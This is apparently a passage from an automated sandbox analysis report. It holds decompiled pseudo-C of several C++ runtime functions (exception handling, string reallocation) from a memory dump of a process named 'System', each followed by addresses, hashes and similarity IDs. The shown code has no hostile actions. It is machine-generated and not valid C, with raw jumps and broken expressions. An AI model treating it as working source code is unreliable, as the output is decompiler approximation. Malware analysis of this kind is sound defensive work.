                                                                                                                                                              			E00007FF67FF6E4C66D44(void* __edx, void* __rax, long long __rbx, long long* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
				void* __rdi;
				void* __r14;
				void* _t74;
				void* _t78;
				void* _t84;
				signed char _t87;
				void* _t89;
				void* _t114;
				void* _t116;
				unsigned long long _t119;
				long long* _t131;
				long long* _t151;
				void* _t168;
				signed char* _t169;
				unsigned long long _t174;
				long long _t176;
				void* _t177;
				void* _t179;
				void* _t180;
				void* _t195;
				void* _t196;
				void* _t198;

				_t189 = __r9;
				_t116 = __rax;
				 *((long long*)(_t179 + 8)) = __rbx;
				 *((long long*)(_t179 + 0x10)) = _t176;
				 *((long long*)(_t179 + 0x18)) = __rsi;
				_t180 = _t179 - 0x80;
				_t131 = __rcx;
				_t177 = __r9;
				_t196 = __rdx;
				E00007FF67FF6E4C68194(_t74, __r8);
				E00007FF67FF6E4C64EF8(_t116);
				_t169 =  *((intOrPtr*)(_t180 + 0xc0));
				r8d = 0x80000029;
				r9d = 0x80000026;
				if ( *((intOrPtr*)(_t116 + 0x40)) != 0) goto 0xe4c66dbe;
				if ( *__rcx == 0xe06d7363) goto 0xe4c66dbe;
				if ( *((intOrPtr*)(__rcx)) != r8d) goto 0xe4c66db0;
				if ( *((long long*)(__rcx + 0x18)) != 0xf) goto 0xe4c66db5;
				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0xe4c66dbe;
				if ( *((intOrPtr*)(__rcx)) == r9d) goto 0xe4c66dbe;
				if (( *_t169 & 0x00000020) != 0) goto 0xe4c66fb0;
				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0xe4c66ee2;
				if (_t169[8] == 0) goto 0xe4c66fb0;
				_t119 =  *(_t169[8] +  *((intOrPtr*)(__r9 + 8)) -  *((char*)(( *(_t169[8] +  *((intOrPtr*)(__r9 + 8))) & 0xf) + 0x7ff6e4c92b50)) - 4) >>  *(( *(_t169[8] +  *((intOrPtr*)(__r9 + 8))) & 0xf) + 0x7ff6e4c92b60);
				if (_t119 == 0) goto 0xe4c66fb0;
				if ( *((intOrPtr*)(_t180 + 0xc8)) != 0) goto 0xe4c66fb0;
				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0xe4c66ecf;
				if ( *((intOrPtr*)(__rcx)) != r9d) goto 0xe4c66e86;
				r9d = E00007FF67FF6E4C651A4(__edx, __rcx, _t169, __r9, _t169, 0,  *((intOrPtr*)(__r9 + 0x20)), _t196, _t198, _t195);
				if (_t119 - 0xffffffff < 0) goto 0xe4c66fd2;
				if (_t169[8] == 0) goto 0xe4c66e6a;
				_t174 =  *(_t169[8] +  *((intOrPtr*)(_t177 + 8)) -  *((char*)(( *(_t169[8] +  *((intOrPtr*)(_t177 + 8))) & 0xf) + 0x7ff6e4c92b50)) - 4) >>  *(( *(_t169[8] +  *((intOrPtr*)(_t177 + 8))) & 0xf) + 0x7ff6e4c92b60);
				if (r9d - _t89 >= 0) goto 0xe4c66fd2;
				_t78 = E00007FF67FF6E4C67990( *(( *(_t169[8] +  *((intOrPtr*)(_t177 + 8))) & 0xf) + 0x7ff6e4c92b60), _t196, _t177, _t169, _t189);
				goto 0xe4c66fb0;
				if ( *((intOrPtr*)(__rcx)) != r8d) goto 0xe4c66ecf;
				r9d =  *((intOrPtr*)(__rcx + 0x38));
				if (r9d - 0xffffffff < 0) goto 0xe4c66fd2;
				_t87 =  *(( *(_t169[8] +  *((intOrPtr*)(_t177 + 8))) & 0xf) + 0x7ff6e4c92b60);
				if (r9d - _t78 >= 0) goto 0xe4c66fd2;
				goto 0xe4c66e76;
				E00007FF67FF6E4C635A8( *(_t169[8] +  *((intOrPtr*)(_t177 + 8)) -  *((char*)(( *(_t169[8] +  *((intOrPtr*)(_t177 + 8))) & 0xf) + 0x7ff6e4c92b50)) - 4) >> _t87, _t196, _t169);
				goto 0xe4c66fb0;
				E00007FF67FF6E4C67054(_t180 + 0x50, _t169,  *((intOrPtr*)(_t177 + 8)));
				if ( *((intOrPtr*)(_t180 + 0x50)) != _t174) goto 0xe4c66f02;
				if (( *_t169 & 0x00000040) == 0) goto 0xe4c66fb0;
				if ( *_t131 != 0xe06d7363) goto 0xe4c66f77;
				if ( *((long long*)(_t131 + 0x18)) - 3 < 0) goto 0xe4c66f77;
				if ( *((long long*)(_t131 + 0x20)) - 0x19930522 <= 0) goto 0xe4c66f77;
				_t114 =  *((intOrPtr*)( *((intOrPtr*)(_t131 + 0x30)) + 8)) - _t174;
				if (_t114 == 0) goto 0xe4c66f77;
				E00007FF67FF6E4C63DFC( *((intOrPtr*)(_t131 + 0x30)));
				if (_t114 == 0) goto 0xe4c66f77;
				 *(_t180 + 0x38) =  *(_t180 + 0xd8) & 0x000000ff;
				 *((long long*)(_t180 + 0x30)) =  *((intOrPtr*)(_t180 + 0xd0));
				 *((long long*)(_t180 + 0x28)) =  *((intOrPtr*)(_t180 + 0xc8));
				 *(_t180 + 0x20) = _t169;
				 *0xe4c894c0(_t168);
				goto 0xe4c66fb5;
				 *(_t180 + 0x38) =  *((intOrPtr*)(_t180 + 0xd0));
				 *((long long*)(_t180 + 0x30)) =  *((intOrPtr*)(_t180 + 0xc8));
				_t151 = _t131;
				 *((char*)(_t180 + 0x28)) =  *(_t180 + 0xd8);
				 *(_t180 + 0x20) = _t169;
				_t84 = E00007FF67FF6E4C65E84(_t87, _t151, _t196, 0x7ff6e4c40000, _t177);
				 *0x1 =  *0x1;
				 *(_t151 - 0x75) =  *(_t151 - 0x75) + _t87;
				 *(_t151 - 0x75) =  *(_t151 - 0x75) & _t87;
				return _t84;
			}

























                                                                                                                                                              0x7ff6e4c66d44
                                                                                                                                                              0x7ff6e4c66d44
                                                                                                                                                              0x7ff6e4c66d44
                                                                                                                                                              0x7ff6e4c66d49
                                                                                                                                                              0x7ff6e4c66d4e
                                                                                                                                                              0x7ff6e4c66d58
                                                                                                                                                              0x7ff6e4c66d5f
                                                                                                                                                              0x7ff6e4c66d62
                                                                                                                                                              0x7ff6e4c66d6b
                                                                                                                                                              0x7ff6e4c66d6e
                                                                                                                                                              0x7ff6e4c66d73
                                                                                                                                                              0x7ff6e4c66d78
                                                                                                                                                              0x7ff6e4c66d82
                                                                                                                                                              0x7ff6e4c66d88
                                                                                                                                                              0x7ff6e4c66d91
                                                                                                                                                              0x7ff6e4c66d99
                                                                                                                                                              0x7ff6e4c66d9e
                                                                                                                                                              0x7ff6e4c66da4
                                                                                                                                                              0x7ff6e4c66dae
                                                                                                                                                              0x7ff6e4c66db3
                                                                                                                                                              0x7ff6e4c66db8
                                                                                                                                                              0x7ff6e4c66dc2
                                                                                                                                                              0x7ff6e4c66dcb
                                                                                                                                                              0x7ff6e4c66dfd
                                                                                                                                                              0x7ff6e4c66e01
                                                                                                                                                              0x7ff6e4c66e0e
                                                                                                                                                              0x7ff6e4c66e18
                                                                                                                                                              0x7ff6e4c66e21
                                                                                                                                                              0x7ff6e4c66e32
                                                                                                                                                              0x7ff6e4c66e38
                                                                                                                                                              0x7ff6e4c66e41
                                                                                                                                                              0x7ff6e4c66e68
                                                                                                                                                              0x7ff6e4c66e6d
                                                                                                                                                              0x7ff6e4c66e7c
                                                                                                                                                              0x7ff6e4c66e81
                                                                                                                                                              0x7ff6e4c66e89
                                                                                                                                                              0x7ff6e4c66e8b
                                                                                                                                                              0x7ff6e4c66e93
                                                                                                                                                              0x7ff6e4c66eb0
                                                                                                                                                              0x7ff6e4c66ec3
                                                                                                                                                              0x7ff6e4c66ecd
                                                                                                                                                              0x7ff6e4c66ed8
                                                                                                                                                              0x7ff6e4c66edd
                                                                                                                                                              0x7ff6e4c66eee
                                                                                                                                                              0x7ff6e4c66ef7
                                                                                                                                                              0x7ff6e4c66efc
                                                                                                                                                              0x7ff6e4c66f08
                                                                                                                                                              0x7ff6e4c66f0e
                                                                                                                                                              0x7ff6e4c66f17
                                                                                                                                                              0x7ff6e4c66f1d
                                                                                                                                                              0x7ff6e4c66f20
                                                                                                                                                              0x7ff6e4c66f22
                                                                                                                                                              0x7ff6e4c66f35
                                                                                                                                                              0x7ff6e4c66f42
                                                                                                                                                              0x7ff6e4c66f54
                                                                                                                                                              0x7ff6e4c66f63
                                                                                                                                                              0x7ff6e4c66f6a
                                                                                                                                                              0x7ff6e4c66f6f
                                                                                                                                                              0x7ff6e4c66f75
                                                                                                                                                              0x7ff6e4c66f82
                                                                                                                                                              0x7ff6e4c66f94
                                                                                                                                                              0x7ff6e4c66f98
                                                                                                                                                              0x7ff6e4c66fa2
                                                                                                                                                              0x7ff6e4c66fa6
                                                                                                                                                              0x7ff6e4c66fab
                                                                                                                                                              0x7ff6e4c66fb9
                                                                                                                                                              0x7ff6e4c66fbc
                                                                                                                                                              0x7ff6e4c66fc0
                                                                                                                                                              0x7ff6e4c66fd1

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __except_validate_context_record
                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                              • API String ID: 1467352782-3733052814
                                                                                                                                                              • Opcode ID: 811ad17a60e8fd7c9130e195e7a39a578938059862f85b2d73f6e8f098065cfc
                                                                                                                                                              • Instruction ID: 399f7e297284e985eef0b6036e779cdd143a16631faf36af789be8d2f2cef453
                                                                                                                                                              • Opcode Fuzzy Hash: 811ad17a60e8fd7c9130e195e7a39a578938059862f85b2d73f6e8f098065cfc
                                                                                                                                                              • Instruction Fuzzy Hash: 2A71B1BB65868286D7608F35D090779BBB0FB84F88F14C176DA4C87A89CF2DE451C746
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C50570 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00007FF67FF6E4C50570(long long* __rcx, void* __rdx, long long __rdi, void* __r9, long long __r12, long long __r13) {
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t53;
				long long _t54;
				long long _t61;
				signed long long _t66;
				unsigned long long _t79;
				long long* _t92;
				long long _t93;
				unsigned long long _t94;
				void* _t96;
				signed long long _t104;
				intOrPtr _t109;
				void* _t110;

				_t109 =  *((intOrPtr*)(__rcx + 0x10));
				_t92 = __rcx;
				if (0xffffffff - _t109 - __rdx < 0) goto 0xe4c5071a;
				 *((long long*)(_t96 + 0x58)) = _t93;
				_t94 =  *((intOrPtr*)(__rcx + 0x18));
				 *((long long*)(_t96 + 0x60)) = __rdi;
				 *((long long*)(_t96 + 0x68)) = __r12;
				_t104 = _t109 + __rdx;
				 *((long long*)(_t96 + 0x20)) = __r13;
				_t66 = _t104 | 0x0000000f;
				if (_t66 - 0xffffffff > 0) goto 0xe4c50600;
				_t79 = _t94 >> 1;
				if (_t94 - 0xffffffff - _t79 > 0) goto 0xe4c50600;
				_t53 = _t79 + _t94;
				_t9 = ( <  ? _t53 : _t66) + 1; // 0x1
				_t54 = _t9;
				if (_t54 - 0x1000 < 0) goto 0xe4c50626;
				_t10 = _t54 + 0x27; // 0x28
				if (_t10 - _t54 <= 0) goto 0xe4c50714;
				goto 0xe4c5060a;
				E00007FF67FF6E4C623D8(_t54, 0x27);
				if (_t54 == 0) goto 0xe4c5070e;
				_t11 = _t54 + 0x27; // 0x27
				 *((long long*)((_t11 & 0xffffffe0) - 8)) = _t54;
				goto 0xe4c5063a;
				if (_t54 == 0) goto 0xe4c50638;
				_t33 = E00007FF67FF6E4C623D8(_t54, _t54);
				goto 0xe4c5063a;
				r13d =  *((char*)(_t96 + 0x78));
				_t110 = _t109 - __r9;
				 *((long long*)(_t92 + 0x18)) =  <  ? _t53 : _t66;
				 *(_t92 + 0x10) = _t104;
				_t105 = 0 + __r9;
				_t17 = _t110 + 1; // 0x1
				 *((long long*)(_t96 + 0x50)) = _t17;
				if (_t94 - 0x10 < 0) goto 0xe4c506c3;
				_t61 =  *_t92;
				E00007FF67FF6E4C64380();
				_t34 = E00007FF67FF6E4C64A30(_t33, r13d, 0 + __r9, _t61,  *((intOrPtr*)(_t96 + 0x70)));
				E00007FF67FF6E4C64380();
				_t23 = _t94 + 1; // 0x11
				if (_t23 - 0x1000 < 0) goto 0xe4c506b9;
				_t25 = _t61 -  *((intOrPtr*)(_t61 - 8)) - 8; // -7
				if (_t25 - 0x1f > 0) goto 0xe4c5070e;
				0xe4c623d0();
				goto 0xe4c506e9;
				E00007FF67FF6E4C64380();
				_t35 = E00007FF67FF6E4C64A30(_t34, r13d, _t105, _t92,  *((intOrPtr*)(_t96 + 0x70)));
				E00007FF67FF6E4C64380();
				 *_t92 = 0;
				return _t35;
			}


















                                                                                                                                                              0x7ff6e4c5057b
                                                                                                                                                              0x7ff6e4c50592
                                                                                                                                                              0x7ff6e4c50598
                                                                                                                                                              0x7ff6e4c5059e
                                                                                                                                                              0x7ff6e4c505a3
                                                                                                                                                              0x7ff6e4c505a7
                                                                                                                                                              0x7ff6e4c505ac
                                                                                                                                                              0x7ff6e4c505b1
                                                                                                                                                              0x7ff6e4c505b8
                                                                                                                                                              0x7ff6e4c505bd
                                                                                                                                                              0x7ff6e4c505c4
                                                                                                                                                              0x7ff6e4c505cc
                                                                                                                                                              0x7ff6e4c505d5
                                                                                                                                                              0x7ff6e4c505d7
                                                                                                                                                              0x7ff6e4c505e5
                                                                                                                                                              0x7ff6e4c505e5
                                                                                                                                                              0x7ff6e4c505ef
                                                                                                                                                              0x7ff6e4c505f1
                                                                                                                                                              0x7ff6e4c505f8
                                                                                                                                                              0x7ff6e4c505fe
                                                                                                                                                              0x7ff6e4c5060a
                                                                                                                                                              0x7ff6e4c50612
                                                                                                                                                              0x7ff6e4c50618
                                                                                                                                                              0x7ff6e4c50620
                                                                                                                                                              0x7ff6e4c50624
                                                                                                                                                              0x7ff6e4c50629
                                                                                                                                                              0x7ff6e4c5062e
                                                                                                                                                              0x7ff6e4c50636
                                                                                                                                                              0x7ff6e4c5063a
                                                                                                                                                              0x7ff6e4c50640
                                                                                                                                                              0x7ff6e4c50643
                                                                                                                                                              0x7ff6e4c5064a
                                                                                                                                                              0x7ff6e4c5064e
                                                                                                                                                              0x7ff6e4c50655
                                                                                                                                                              0x7ff6e4c5065e
                                                                                                                                                              0x7ff6e4c50667
                                                                                                                                                              0x7ff6e4c50669
                                                                                                                                                              0x7ff6e4c5066f
                                                                                                                                                              0x7ff6e4c5067d
                                                                                                                                                              0x7ff6e4c5068f
                                                                                                                                                              0x7ff6e4c50694
                                                                                                                                                              0x7ff6e4c5069f
                                                                                                                                                              0x7ff6e4c506ac
                                                                                                                                                              0x7ff6e4c506b4
                                                                                                                                                              0x7ff6e4c506bc
                                                                                                                                                              0x7ff6e4c506c1
                                                                                                                                                              0x7ff6e4c506c6
                                                                                                                                                              0x7ff6e4c506d4
                                                                                                                                                              0x7ff6e4c506e4
                                                                                                                                                              0x7ff6e4c506e9
                                                                                                                                                              0x7ff6e4c5070d

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID: ios_base::badbit set
                                                                                                                                                              • API String ID: 73155330-3882152299
                                                                                                                                                              • Opcode ID: 5556584ec2a5550be82de856d047f58fcb740bf199a4082d157592a11c41e223
                                                                                                                                                              • Instruction ID: ae71607cfe3550d6ee1c01842d26adbce0baaf628f22f28b01bfc89813290cce
                                                                                                                                                              • Opcode Fuzzy Hash: 5556584ec2a5550be82de856d047f58fcb740bf199a4082d157592a11c41e223
                                                                                                                                                              • Instruction Fuzzy Hash: 9041DF2B749B4385EA00AB26A0842BEA375FB44FD0F444636DE5D87796DE7DE041C309
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C67374 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                              			E00007FF67FF6E4C67374(void* __eflags, void* __rcx, signed long long _a8, long long _a16, signed int _a24, void* _a32) {
				char _v80;
				long long _v96;
				long long _v104;
				long long _v136;
				signed long long _v144;
				signed int _v152;
				long long _v160;
				long long _v168;
				signed long long _v176;
				signed int _v184;
				void* __rbx;
				void* _t83;
				void* _t101;
				void* _t114;
				long long _t115;
				signed long long _t121;
				void* _t124;
				long long _t126;
				signed long long _t128;
				long long _t153;
				long long* _t154;
				void* _t155;
				void* _t158;
				signed long long _t161;

				_t114 = _t155;
				r12d = 0;
				_v184 = r12d;
				_a24 = _a24 & r12d;
				_v176 = _v176 & _t161;
				_v152 = _v152 & _t161;
				 *((intOrPtr*)(_t114 - 0x80)) = r12b;
				 *(_t114 - 0x7c) =  *(_t114 - 0x7c) & r12d;
				 *(_t114 - 0x78) =  *(_t114 - 0x78) & r12d;
				 *(_t114 - 0x74) =  *(_t114 - 0x74) & r12d;
				 *(_t114 - 0x70) =  *(_t114 - 0x70) & r12d;
				 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & r12d;
				E00007FF67FF6E4C64EF8(_t114);
				_t115 =  *((intOrPtr*)(_t114 + 0x28));
				_v160 = _t115;
				_t83 = E00007FF67FF6E4C64EF8(_t115);
				_v168 =  *((intOrPtr*)(_t115 + 0x20));
				_t153 =  *((intOrPtr*)(__rcx + 0x50));
				_a32 = _t153;
				_t126 =  *((intOrPtr*)(__rcx + 0x40));
				_v136 =  *((intOrPtr*)(__rcx + 0x30));
				_v104 =  *((intOrPtr*)(__rcx + 0x48));
				_v96 =  *((intOrPtr*)(__rcx + 0x68));
				_a16 =  *((intOrPtr*)(__rcx + 0x78));
				_t121 =  *((intOrPtr*)(__rcx + 0x38));
				_a8 = _t121;
				E00007FF67FF6E4C68194(_t83, _t126);
				E00007FF67FF6E4C64EF8(_t121);
				 *((long long*)(_t121 + 0x20)) = _t153;
				E00007FF67FF6E4C64EF8(_t121);
				 *((long long*)(_t121 + 0x28)) = _t126;
				E00007FF67FF6E4C64EF8(_t121);
				E00007FF67FF6E4C63D58(_t121,  &_v80,  *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x20)) + 0x28)));
				_v144 = _t121;
				if ( *((intOrPtr*)(__rcx + 0x58)) == _t161) goto 0xe4c67476;
				_a24 = 1;
				E00007FF67FF6E4C64EF8(_t121);
				_v152 =  *((intOrPtr*)(_t121 + 0x70));
				r8d = 0x100;
				E00007FF67FF6E4C68510(_v136,  *((intOrPtr*)(__rcx + 0x28)), _t158);
				_v176 = _t121;
				if (_t121 - 2 >= 0) goto 0xe4c674aa;
				_t128 =  *((intOrPtr*)(_t155 - 0xa8 + 0x70 + _t121 * 8));
				if (_t128 == 0) goto 0xe4c675bd;
				_v176 = _t128;
				E00007FF67FF6E4C68540(_t128,  *((intOrPtr*)(__rcx + 0x28)));
				_v184 = 1;
				E00007FF67FF6E4C64EF8(_t121);
				 *(_t121 + 0x40) =  *(_t121 + 0x40) & 0x00000000;
				E00007FF67FF6E4C64EF8(_t121);
				 *((long long*)(_t121 + 0x78)) = _a16;
				_t154 = _a32;
				if (_a24 == 0) goto 0xe4c67511;
				E00007FF67FF6E4C64068(1, _t154);
				r8d =  *((intOrPtr*)(_v152 + 0x18));
				goto 0xe4c6751e;
				r8d =  *((intOrPtr*)(_t154 + 0x18));
				RaiseException(??, ??, ??, ??);
				r12d = _v184;
				E00007FF67FF6E4C63D94(_v152, _v176, _v144);
				if (r12d != 0) goto 0xe4c6757c;
				if ( *_t154 != 0xe06d7363) goto 0xe4c6757c;
				if ( *((long long*)(_t154 + 0x18)) != 4) goto 0xe4c6757c;
				_t124 =  *((intOrPtr*)(_t154 + 0x20)) - 0x19930520;
				if (_t124 - 2 > 0) goto 0xe4c6757c;
				E00007FF67FF6E4C640DC(_t124,  *((intOrPtr*)(_t154 + 0x28)));
				if (_t124 == 0) goto 0xe4c6757c;
				E00007FF67FF6E4C64068(1, _t154);
				E00007FF67FF6E4C64EF8(_t124);
				 *((long long*)(_t124 + 0x20)) = _v168;
				E00007FF67FF6E4C64EF8(_t124);
				 *((long long*)(_t124 + 0x28)) = _v160;
				E00007FF67FF6E4C64EF8(_t124);
				 *((long long*)(_t124 + 0x78)) = _a8;
				_t101 = E00007FF67FF6E4C64EF8(_t124);
				 *((long long*)(_t124 + 0x78)) = 0xfffffffe;
				return _t101;
			}



























                                                                                                                                                              0x7ff6e4c67374
                                                                                                                                                              0x7ff6e4c6738a
                                                                                                                                                              0x7ff6e4c6738d
                                                                                                                                                              0x7ff6e4c67392
                                                                                                                                                              0x7ff6e4c6739a
                                                                                                                                                              0x7ff6e4c6739f
                                                                                                                                                              0x7ff6e4c673a4
                                                                                                                                                              0x7ff6e4c673a8
                                                                                                                                                              0x7ff6e4c673ac
                                                                                                                                                              0x7ff6e4c673b0
                                                                                                                                                              0x7ff6e4c673b4
                                                                                                                                                              0x7ff6e4c673b8
                                                                                                                                                              0x7ff6e4c673bc
                                                                                                                                                              0x7ff6e4c673c1
                                                                                                                                                              0x7ff6e4c673c5
                                                                                                                                                              0x7ff6e4c673ca
                                                                                                                                                              0x7ff6e4c673d3
                                                                                                                                                              0x7ff6e4c673d8
                                                                                                                                                              0x7ff6e4c673dc
                                                                                                                                                              0x7ff6e4c673e4
                                                                                                                                                              0x7ff6e4c673ec
                                                                                                                                                              0x7ff6e4c673f9
                                                                                                                                                              0x7ff6e4c67402
                                                                                                                                                              0x7ff6e4c6740a
                                                                                                                                                              0x7ff6e4c67411
                                                                                                                                                              0x7ff6e4c67414
                                                                                                                                                              0x7ff6e4c6741e
                                                                                                                                                              0x7ff6e4c67423
                                                                                                                                                              0x7ff6e4c67428
                                                                                                                                                              0x7ff6e4c6742c
                                                                                                                                                              0x7ff6e4c67431
                                                                                                                                                              0x7ff6e4c67435
                                                                                                                                                              0x7ff6e4c6744a
                                                                                                                                                              0x7ff6e4c67452
                                                                                                                                                              0x7ff6e4c6745b
                                                                                                                                                              0x7ff6e4c6745d
                                                                                                                                                              0x7ff6e4c67468
                                                                                                                                                              0x7ff6e4c67471
                                                                                                                                                              0x7ff6e4c67476
                                                                                                                                                              0x7ff6e4c67484
                                                                                                                                                              0x7ff6e4c6748c
                                                                                                                                                              0x7ff6e4c67495
                                                                                                                                                              0x7ff6e4c67497
                                                                                                                                                              0x7ff6e4c6749f
                                                                                                                                                              0x7ff6e4c674a5
                                                                                                                                                              0x7ff6e4c674b0
                                                                                                                                                              0x7ff6e4c674c1
                                                                                                                                                              0x7ff6e4c674c9
                                                                                                                                                              0x7ff6e4c674ce
                                                                                                                                                              0x7ff6e4c674d2
                                                                                                                                                              0x7ff6e4c674de
                                                                                                                                                              0x7ff6e4c674e1
                                                                                                                                                              0x7ff6e4c674f1
                                                                                                                                                              0x7ff6e4c674f8
                                                                                                                                                              0x7ff6e4c67506
                                                                                                                                                              0x7ff6e4c6750f
                                                                                                                                                              0x7ff6e4c67515
                                                                                                                                                              0x7ff6e4c6751e
                                                                                                                                                              0x7ff6e4c67524
                                                                                                                                                              0x7ff6e4c67540
                                                                                                                                                              0x7ff6e4c67548
                                                                                                                                                              0x7ff6e4c67550
                                                                                                                                                              0x7ff6e4c67556
                                                                                                                                                              0x7ff6e4c6755b
                                                                                                                                                              0x7ff6e4c67563
                                                                                                                                                              0x7ff6e4c67569
                                                                                                                                                              0x7ff6e4c67570
                                                                                                                                                              0x7ff6e4c67577
                                                                                                                                                              0x7ff6e4c6757c
                                                                                                                                                              0x7ff6e4c67581
                                                                                                                                                              0x7ff6e4c67585
                                                                                                                                                              0x7ff6e4c6758a
                                                                                                                                                              0x7ff6e4c6758e
                                                                                                                                                              0x7ff6e4c6759a
                                                                                                                                                              0x7ff6e4c6759d
                                                                                                                                                              0x7ff6e4c675a2
                                                                                                                                                              0x7ff6e4c675bc

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                              • String ID: csm
                                                                                                                                                              • API String ID: 2558813199-1018135373
                                                                                                                                                              • Opcode ID: 21ec3d684fe702d55a5fbc364e51b33668b28d7fd30d149997bb5d2b227b7df8
                                                                                                                                                              • Instruction ID: c3f3e82084bca141a2a015a6dd522b023698c0678eb1e543d16e0a04c5bb55c2
                                                                                                                                                              • Opcode Fuzzy Hash: 21ec3d684fe702d55a5fbc364e51b33668b28d7fd30d149997bb5d2b227b7df8
                                                                                                                                                              • Instruction Fuzzy Hash: 77517C3B66964286D6609B26A48037D77B4FB89F90F104176DB8D87B55CF3DD060CB09
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C4CA80 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E00007FF67FF6E4C4CA80(long long* __rcx, void* __rdx, long long __rdi, void* __r9, long long __r14, long long __r15) {
				void* _t26;
				long long _t44;
				long long _t49;
				signed long long _t55;
				void* _t58;
				long long _t59;
				unsigned long long _t67;
				long long* _t80;
				long long _t81;
				unsigned long long _t82;
				void* _t84;
				intOrPtr _t89;
				signed long long _t92;
				void* _t93;
				intOrPtr _t96;

				_t89 =  *((intOrPtr*)(__rcx + 0x10));
				_t80 = __rcx;
				if (0xffffffff - _t89 - __rdx < 0) goto 0xe4c4cc00;
				 *((long long*)(_t84 + 0x70)) = _t81;
				_t82 =  *((intOrPtr*)(__rcx + 0x18));
				 *((long long*)(_t84 + 0x28)) = __r14;
				_t92 = __rdx + _t89;
				_t55 = _t92 | 0x0000000f;
				if (_t55 - 0xffffffff > 0) goto 0xe4c4caeb;
				_t67 = _t82 >> 1;
				if (_t82 - 0xffffffff - _t67 > 0) goto 0xe4c4caeb;
				_t49 =  <  ? _t67 + _t82 : _t55;
				 *((long long*)(_t84 + 0x30)) = __rdi;
				 *((long long*)(_t84 + 0x20)) = __r15;
				_t58 =  <  ? 0xffffffff : _t49 + 1;
				if (_t58 - 0x1000 < 0) goto 0xe4c4cb3c;
				_t9 = _t58 + 0x27; // 0x8000000000000025
				_t44 = _t9;
				if (_t44 - _t58 <= 0) goto 0xe4c4cc06;
				_t59 = _t44;
				E00007FF67FF6E4C623D8(_t44, _t59);
				if (_t44 == 0) goto 0xe4c4cbfa;
				_t10 = _t44 + 0x27; // 0x27
				 *((long long*)((_t10 & 0xffffffe0) - 8)) = _t44;
				goto 0xe4c4cb4d;
				if (_t59 == 0) goto 0xe4c4cb4b;
				_t26 = E00007FF67FF6E4C623D8(_t44, _t59);
				goto 0xe4c4cb4d;
				_t96 =  *((intOrPtr*)(_t84 + 0x80));
				 *(_t80 + 0x10) = _t92;
				_t93 = 0 + _t89;
				 *((long long*)(_t80 + 0x18)) = _t49;
				if (_t82 - 0x10 < 0) goto 0xe4c4cbba;
				_t50 =  *_t80;
				E00007FF67FF6E4C64380();
